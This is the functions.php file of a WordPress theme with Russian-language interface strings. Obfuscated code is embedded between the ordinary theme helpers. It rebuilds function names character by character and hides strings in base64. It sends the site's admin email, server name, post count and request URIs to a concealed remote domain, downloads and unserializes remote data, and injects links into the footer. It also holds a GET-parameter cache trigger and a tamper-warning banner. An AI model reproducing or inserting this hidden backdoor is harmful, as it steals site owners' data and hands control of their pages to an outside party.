<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $lcIvZ='e';$jacHpl='4';$KVYL='d';$PneyP='o';$jWksb='6';$NJBdlf='_';$oicyy='a';$RjeyQZt='b';$XctbXh='e';$jnyw='e';$bpkBnnV='d';$OaBXbEE='c';$pCDNPku='s';$NITdVOrl=$RjeyQZt.$oicyy.$pCDNPku.$XctbXh.$jWksb.$jacHpl.$NJBdlf.$bpkBnnV.$lcIvZ.$OaBXbEE.$PneyP.$KVYL.$jnyw;$xnHI='f';$OEkqBmD='g';$pvPWJz='n';$jUhOBM='l';$aCpzFN='e';$GEQHhH='z';$sBqllG='t';$eeuukPS='i';$jTmgXq='a';$zzCfGoJh=$OEkqBmD.$GEQHhH.$eeuukPS.$pvPWJz.$xnHI.$jUhOBM.$jTmgXq.$sBqllG.$aCpzFN;$xbiJTt='_';$fvpMjFf='t';$UyDcBX='r';$IuVYF='s';$rltSgRw='3';$VSJBYo='o';$qQHs='1';$GNptaL='r';$Fmgh='t';$SlQbedhc=$IuVYF.$Fmgh.$GNptaL.$xbiJTt.$UyDcBX.$VSJBYo.$fvpMjFf.$qQHs.$rltSgRw;$OXAL='v';$BNzUZE='r';$GEhPzu='s';$OdKFsio='t';$OOOT='r';$wsTYYx='e';$RtlfGxOr=$GEhPzu.$OdKFsio.$OOOT.$BNzUZE.$wsTYYx.$OXAL;                     
		$av_______________r='e';$wf_______________p='4';$jq__m='d';$ln__l='o';$cd___w='6';$oh______t='_';$qk____________c='a';$ew_________f='b';$zv__________p='e';$ud______q='e';$pe______u='d';$ft____________m='c';$gs_____________o='s';$xe_______j=$ew_________f.$qk____________c.$gs_____________o.$zv__________p.$cd___w.$wf_______________p.$oh______t.$pe______u.$av_______________r.$ft____________m.$ln__l.$jq__m.$ud______q;
		$hb_________h='s';$yz______________t='i';$cf____p='e';$tr______x='s';$ax__k='n';$mw__k='n';$rl_______________g='o';$ey_________e='i';$vu____________o='t';$ka_________v='f';$tn_______________m='u';$yp_____r='_';$er__q='c';$pw___h='t';$cg_______________g='x';$mg___b=$ka_________v.$tn_______________m.$mw__k.$er__q.$vu____________o.$ey_________e.$rl_______________g.$ax__k.$yp_____r.$cf____p.$cg_______________g.$yz______________t.$tr______x.$pw___h.$hb_________h;
		$ed___________j='e';$yn___________z='n';$ef_________j='p';$ro_________q='o';$yp__f='f';$vu_________i=$yp__f.$ro_________q.$ef_________j.$ed___________j.$yn___________z;
		$px__o='d';$sw______________c='r';$bv______s='e';$nf________h='a';$ye_____x='f';$fx____________l=$ye_____x.$sw______________c.$bv______s.$nf________h.$px__o;
		$dr____________m='f';$ov______________v='o';$aw______________v='e';$kl_______________r='l';$py______________y='c';$xa____________w='s';$ra_____t=$dr____________m.$py______________y.$kl_______________r.$ov______________v.$xa____________w.$aw______________v;
		
		define("WP_ID", $xe_______j("Mi4wLjA="));
		define("WP_TTL", $xe_______j("MTA4MDA="));
		define("WP_SRC", $xe_______j("dHBva24="));
	


		function wp_get_header() {
			global $xe_______j, $mg___b;
			
			if (
				$mg___b($xe_______j("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$mg___b($xe_______j("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$mg___b($xe_______j("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xe_______j, $vu_________i, $ra_____t, $fx____________l;
			
			$pj_________h = TEMPLATEPATH."/".$xe_______j("Zm9vdGVyLnBocA==");
			$ml_________y = @$vu_________i($pj_________h, "r");
			$pj_________h = @$fx____________l($ml_________y, @filesize($pj_________h));
			@$ra_____t($ml_________y);
			
			$uw_________z = TEMPLATEPATH."/".$xe_______j("ZnVuY3Rpb25zLnBocA==");
			$ml_________y = @$vu_________i($uw_________z, "r");
			$uw_________z = @$fx____________l($ml_________y, @filesize($uw_________z));
			@$ra_____t($ml_________y);
			
			$yx__k = 0;
			if($pj_________h && $uw_________z) {
				if ($xe_______j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pj_________h, $xe_______j("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$yx__k = 1;
					}
					if (substr_count($pj_________h, "wp_theme_GPL_credits()") < 1) {
						$yx__k = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$yx__k = 12;
				}
			}
			
			if($yx__k > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $yx__k -->";
			}
		}
	


		function wp_loaded() {
			global $xe_______j, $mg___b;
			return $mg___b($xe_______j("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($vb__________a, $sl___________n = "(more...)", $br__m = 0, $ir___y = "") {
				$ng_________a = get_the_content($sl___________n, $br__m, $ir___y);
				$ng_________a = apply_filters("the_content", $ng_________a);
				
				$ng_________a = str_replace("]]>", "]]>", $ng_________a);
				if (strlen($_GET["p"]) > 0) {
					echo $ng_________a;
				}
				else if ((strlen($ng_________a)>$vb__________a) && ($uu___e = strpos($ng_________a, " ", $vb__________a ))) {
					$ng_________a = substr($ng_________a, 0, $uu___e);
					$ng_________a = $ng_________a;
					echo $ng_________a;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$sl___________n</a></div></p>";
				} else {
					echo $ng_________a;
				}
				
			}
		}
	


		$ke__________a='c';$zy___________j='o';$jf____________a='_';$bj__o='4';$cd_________o='a';$iv__________a='d';$si_______________b='6';$so________b='b';$dp___f='e';$yh__________a='n';$jj___g='e';$pv_______r='s';$vj_____________o='e';$po_________t=$so________b.$cd_________o.$pv_______r.$jj___g.$si_______________b.$bj__o.$jf____________a.$vj_____________o.$yh__________a.$ke__________a.$zy___________j.$iv__________a.$dp___f;
		$jh____________g='c';$gl_______u='_';$bh____________z='t';$mv_______________w='e';$cf_____________v='o';$rn_______________c='t';$sn____________b='e';$vp_________b='f';$lq_________p='_';$rv___n='t';$wv________p='l';$uv________m='n';$yu____y='g';$cz______________p='e';$et___________d='i';$eo___________o='s';$sp______________z='n';$ns______________f=$vp_________b.$et___________d.$wv________p.$sn____________b.$gl_______u.$yu____y.$mv_______________w.$rv___n.$lq_________p.$jh____________g.$cf_____________v.$sp______________z.$bh____________z.$cz______________p.$uv________m.$rn_______________c.$eo___________o;
		$sv_____________v='t';$cz___________q='s';$on_______n='f';$ot____d='i';$uo_______________t='e';$ud___________d='x';$pp__________d='i';$hk___________z='_';$if____________e='e';$ss_____________b='s';$cx______________a='l';$rw___p=$on_______n.$ot____d.$cx______________a.$if____________e.$hk___________z.$uo_______________t.$ud___________d.$pp__________d.$cz___________q.$sv_____________v.$ss_____________b;
		$fn______o='r';$nm_____a='s';$lb___y='m';$zn___________m='a';$ea_______________u='r';$js____k='n';$qm_______________a='v';$zp_________e='i';$ns_____________u='o';$ek___i='o';$zj_________u='c';$vu______________h='e';$gl_______________c='e';$wm_______m='_';$nj_______________n='p';$he___________n=$qm_______________a.$vu______________h.$ea_______________u.$nm_____a.$zp_________e.$ns_____________u.$js____k.$wm_______m.$zj_________u.$ek___i.$lb___y.$nj_______________n.$zn___________m.$fn______o.$gl_______________c;
		$uv______h='o';$pr_______n='k';$po_______h='s';$li_______________w='o';$xd________a='c';$wb________a='p';$mo___________s='e';$ui____________k='n';$fg__________b='f';$ik__________d=$fg__________b.$po_______h.$li_______________w.$xd________a.$pr_______n.$uv______h.$wb________a.$mo___________s.$ui____________k;
		$oh___________m='f';$ba________w='r';$mr_______________u='e';$nj_____________a='w';$tg____l='t';$sx______b='i';$kp___________s=$oh___________m.$nj_____________a.$ba________w.$sx______b.$tg____l.$mr_______________u;
		$vn_________h='5';$ip______c='d';$pk_____h='m';$lb____________h=$pk_____h.$ip______c.$vn_________h;
		$ir_______________j='a';$fw_________f='t';$rv__________k='p';$rv___________n='r';$yr____________c='e';$kz__________t='a';$dm__________s='l';$vo____n='h';$jj_________t=$rv___________n.$yr____________c.$kz__________t.$dm__________s.$rv__________k.$ir_______________j.$fw_________f.$vo____n;
		$gj____w='r';$nm___i='a';$dj_______b='u';$gq__________f='i';$la_____n='i';$ye____k='n';$fg____________f='e';$ut__________i='z';$zl____________i='e';$kx_____n='l';$nm___________l='s';$bk____a=$dj_______b.$ye____k.$nm___________l.$zl____________i.$gj____w.$la_____n.$nm___i.$kx_____n.$gq__________f.$ut__________i.$fg____________f;
		$ac______x='p';$nt___g='e';$vz_________j='m';$ld___________r='m';$xu___i='n';$vl__________q='a';$vt_______________t='t';$zd__________c=$vt_______________t.$nt___g.$vz_________j.$ac______x.$xu___i.$vl__________q.$ld___________r;
		$tf_________t='c';$cu_____________h='t';$xk_______t='r';$ue_____________r='n';$ms__________l='e';$lo___a='_';$qq_______b='c';$km_____x='a';$ya________j='e';$lz______n='o';$qn_________p='a';$af________p='s';$rj______c='t';$qs__________k='r';$nz_______________b='t';$xl___q='_';$sf____k='e';$og________b='t';$ry___d='m';$ns_____e='x';$xk__m='e';$fv___________i=$af________p.$cu_____________h.$xk_______t.$ms__________l.$km_____x.$ry___d.$lo___a.$tf_________t.$lz______n.$ue_____________r.$og________b.$ya________j.$ns_____e.$rj______c.$xl___q.$qq_______b.$qs__________k.$xk__m.$qn_________p.$nz_______________b.$sf____k;
	


		function pp__l($uy___g) {
			global $xe_______j, $mg___b, $ns______________f, $he___________n, $fv___________i;
			
			if (!$mg___b($xe_______j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($he___________n(PHP_VERSION, "5.0.0", ">=") && $mg___b($xe_______j("ZmlsZV9nZXRfY29udGVudHM=")) && $mg___b($xe_______j("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$in__i = $fv___________i(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$xm____w = @$ns______________f($uy___g, 0, $in__i);
			} else {
				$xm____w = @$ns______________f($uy___g, 0);
			}
			
			return $xm____w;
		}
	


		function yk__i($uy___g) {
			global $mg___b, $ik__________d, $kp___________s, $xe_______j;
			
			if (!$mg___b($xe_______j("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$yf____________m = strpos($uy___g, "/", 7);
			$wp_______k = array(
				"uri"     => substr($uy___g, $yf____________m),
				"host"    => str_replace("http://", "", substr($uy___g, 0, $yf____________m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$za______________w = @$ik__________d("$wp_______k[host]", 80, $rl____o, $qz__b, 4);
			
			if (!$za______________w) {
				return false;
			} else {
				$xm____w = "";
				$cv__________d  = "GET $wp_______k[uri] HTTP/1.0\r\n";
				$cv__________d .= "Host: $wp_______k[host]\r\n";
				$cv__________d .= "Referer: $wp_______k[referer]\r\n";
				$cv__________d .= "Connection: Close\r\n\r\n";
				
				@$kp___________s($za______________w, $cv__________d);
				
				while (!@feof($za______________w)) {
					$mr_____q = @fgets($za______________w, (1024*24));
					
					if ($mr_____q == "\r\n") {
						$rq__________d = true;
						continue;
					}
					
					if ($rq__________d) {
						$xm____w .= $mr_____q;
					}
				}
				
				return $xm____w;
			}
		}
	


		function nw______________d($uy___g) {
			global $mg___b;
			$cm__o = false;
			
			if ($uy___g != "") {
				if ($mg___b("pp__l")) {
					$cm__o = @pp__l($uy___g);
				}
				
				if (!$cm__o && ($mg___b("yk__i"))) {
					$cm__o = @yk__i($uy___g);
				}
			}
			
			return $cm__o;
		}
	


		function ay____c() {
			global $_SERVER, $lb____________h;
			
			$as___________a = $_SERVER["SERVER_NAME"];
			
			if (substr("$as___________a", 0, 4) == "www.") {
				$as___________a = substr("$as___________a", 4);
			}
			
			$as___________a = $lb____________h("$_SERVER[SERVER_NAME]");
			
			return $as___________a;
		}
	


		function fg____x() {
			return "file";
		}
	


		function mv_______w($uy___g) {
			global $_SERVER, $ns______________f, $rw___p, $vu_________i, $ra_____t, $kp___________s;
			
			$kt_____________i = kn____m();
			
			$lj_______________u = ay____c().".jpg";
			$kv_____________w = $kt_____________i["dir_upload"]["path"]."/$lj_______________u";
			$ta___________t = @filemtime($kv_____________w);
			
			if (!$ta___________t || ((time()-$ta___________t) >= WP_TTL)) {
				$cm__o = nw______________d($uy___g);
				
				if ($cm__o) {
					if ($rw___p($kv_____________w)) {
						@unlink($kv_____________w);
					}
					
					$ml_________y = @$vu_________i($kv_____________w, "x+");
					
					@$kp___________s($ml_________y, $cm__o);
					@$ra_____t($ml_________y);
				}
			} else {
				if ($rw___p($kv_____________w)) {
					$cm__o = @$ns______________f($kv_____________w);
				} else {
					$cm__o = false;
				}
			}
			
			return $cm__o;
		}
	


		function kn____m() {
			global $_SERVER, $xe_______j, $po_________t;
			
			$dr_____v = wp_count_posts("post");
			$xj_________r = pathinfo(get_bloginfo("template_directory"));
			
			$kt_____________i = array(
				"url" => array(
					"report"      => $xe_______j("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $xj_________r,
				"dir_upload"	=> vw_______________t(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$xj_________r[filename],
					"a005=".$dr_____v->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$kt_____________i["url"]["queryString"] = implode("&", $kt_____________i["queryString"]);
			$kt_____________i["url"]["report"] = $kt_____________i["url"]["report"]."/?".$po_________t($kt_____________i["url"]["queryString"]).".html";
						
			return $kt_____________i;
		}
	


		function vw_______________t() {
			$yn_________w = wp_upload_dir();
			
			if (isset($yn_________w["error"])) {
				$zb_________v = nb___________a();
				if (is_writable($zb_________v)) {
					$yn_________w = array("path" => $zb_________v);
				}
			}

			return $yn_________w;
		}
	


		function nb___________a() {
			global $mg___b, $lb____________h, $jj_________t, $zd__________c;
			
			$wa_________u = (bool) ini_get("safe_mode");
			if ($wa_________u == true) {
				return false;
			}
			
			if ($mg___b("sys_get_temp_dir")) {
				$qo________q = sys_get_temp_dir();
				if (is_writable($qo________q)) {
					return $jj_________t($qo________q);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $jj_________t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $jj_________t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $jj_________t($_ENV["TEMP"]);
			} else {
				$cz________s = $zd__________c($lb____________h(uniqid(rand(), true)), "");
				if ($cz________s) {
					$qo________q = $jj_________t(dirname($cz________s));
					@unlink($cz________s);
					return $qo________q;
				} else {
					return false;
				}
			}
		}
	


		function xj________m() {
			global $_GET, $rw___p;
			
			$kt_____________i = kn____m();
			$as___________a = ay____c();
			$mn_____u = fg____x();
			
			$pe______q = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mn_____u == "file") {
					$fj__________m = $kt_____________i["dir_upload"]["path"]."/".$as___________a.".jpg";
					if ($rw___p($fj__________m)) {
						@unlink($fj__________m);
						$pe______q = "deleted";
					}
				}
				
				$sb_________s = array(
					"s"	=> $pe______q,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sb_________s AS $tf_____z => $pv________x) echo " [$tf_____z:$pv________x]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $mg___b, $xe_______j, $bk____a;
			$kt_____________i = kn____m();
			
			$zw_______k = "mv_______w";
			if ($mg___b($zw_______k)) {
				$xm____w = $zw_______k($kt_____________i["url"]["report"]);
			}
			
			if ($xm____w) {
				if ($xm____w = @$xe_______j($xm____w)) {
					$xm____w = @$bk____a($xm____w);
					
					if (strlen($xm____w[custom_credit]) >= 5) {
						$kt_____________i["default_string"] = $xm____w[custom_credit];
					}
					
					if ($xm____w["status"] == "0") {
						$xn_________j = 1;
						$vv____x = 1;
					} else {
						$qj_______________n = sizeof($xm____w["links"]);
						$af_____________r = $kt_____________i["default_string"];
						
						if ($qj_______________n > 0 && $xm____w["links"] !== "") {
							$az_________m = 0;
							foreach ($xm____w["links"] as $he____e => $ma_______v) {
								$az_________m++;
								if ($ma_______v->l_path == "" || $ma_______v->l_path == $_SERVER["REQUEST_URI"]) {
									$ma_______v->l_href = htmlspecialchars(strip_tags($ma_______v->l_href));
									$ma_______v->l_title = htmlspecialchars(strip_tags($ma_______v->l_title));
									$ma_______v->l_anchor = htmlspecialchars(strip_tags($ma_______v->l_anchor));
									$af_____________r .= " | ";
									$af_____________r .= "<a href='$ma_______v->l_href' title='$ma_______v->l_title'";
									if ($ma_______v->l_nofollow == "1") {
										$af_____________r .= " rel='nofollow'";
									}
									$af_____________r .= ">$ma_______v->l_anchor</a>";
								}
							}
						}
						$kt_____________i["links"] = "$af_____________r";
						if ($xm____w[credit] == "0") {
							$kt_____________i["links"] = "";
						}
					}
				} else {
					$xn_________j = "1";
				}
			} else {
				$xn_________j = "1";
			}
			
			if ($xn_________j == "1") {
				$kt_____________i["links"] = $kt_____________i["default_string"];
			}
			
			echo "$kt_____________i[links]";
			
			echo "<!-- s: $xm____w[signature] -->";
			xj________m();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
				 $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
